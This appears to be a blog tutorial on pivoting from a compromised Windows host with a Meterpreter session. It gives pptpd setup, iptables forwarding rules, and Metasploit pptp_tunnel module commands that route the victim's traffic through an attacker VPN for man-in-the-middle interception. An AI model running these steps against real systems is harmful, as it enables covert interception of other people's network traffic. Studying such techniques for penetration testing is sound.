Tunnling Techniques with tun/tap interfaces- Metasploit: PPTP tunnel(MITM - share internet to compromised internal host), ligolo-ng, easy-openvpn-server
Hi, here we will see how we can perform Man in the Middle (MITM) attack on a compromised remote Windows machine.
Prerequisites: Meterpreter session
sessions -l
Steps:
- Installing VPN server:
I have already installed it. You can install it by running the command given below.
apt install pptpd -y
2. Configuring VPN server:
a) Edit this file /etc/pptpd.conf and add these line at last.
localip 192.169.0.1
remoteip 192.169.0.234-238
basically here we have defined our server’s IP address and IP address range for assigning ips to the VPN clients.
b) Edit this file /etc/ppp/chap-secrets and this line at last.
root * testertest *
Here we defined the credentials which client uses to authenticate to VPN server.
3. Starting the VPN server:
systemctl start pptpd
systemctl status pptpd
We can also check listening processes via netstat.
netstat -lntp
PPTP server by default runs on port 1723.
4. Create and run this bash script:
Replace the eth1 with your own interface being used for internet connection.
#!/bin/bash
/etc/init.d/pptpd restart && netstat -putan | grep 1723
iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE
iptables -A FORWARD -i ppp0 -o eth1 -j ACCEPT
iptables -A FORWARD -i eth1 -o ppp0 -m state --state ESTABLISHED,RELATED -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward
route -n# eth1 is interface with internet access on attacker system
Then run the bash script.
chmod +x pptpd_server.sh
I didn’t understood this completely (maybe you can help me understand this in comments😅) but here:
a) In line no.2 we are restarting the the pptpd daemon and running netstat and filtering its output to only show lines containing string 1723
b) In line no. 6 we are enabling packet forwarding.
c) In line no. 7 we are printing the routing table.
5. Connecting to VPN server(from compromised host):
msf6 > use windows/manage/pptp_tunnel
msf6 post(windows/manage/pptp_tunnel) > set username root
username => root
msf6 post(windows/manage/pptp_tunnel) > set password testertest
password => testertest
msf6 post(windows/manage/pptp_tunnel) > set vpnhost 192.168.70.45
vpnhost => 192.168.70.45
msf6 post(windows/manage/pptp_tunnel) > set session 2
session => 2
msf6 post(windows/manage/pptp_tunnel) > run
6. Testing MITM:
a) We will try pinging google dns server(8.8.8.8) and also run wireshark(choose ppp0 interface) to see weather Mitm is working or not.
Note: Remeber to run wireshark on attacker system and intercept traffic for pptp vpn’s interface.
Thanks for reading!
Author: Prabhsimran (https://www.linkedin.com/in/pswalia2u/)
References: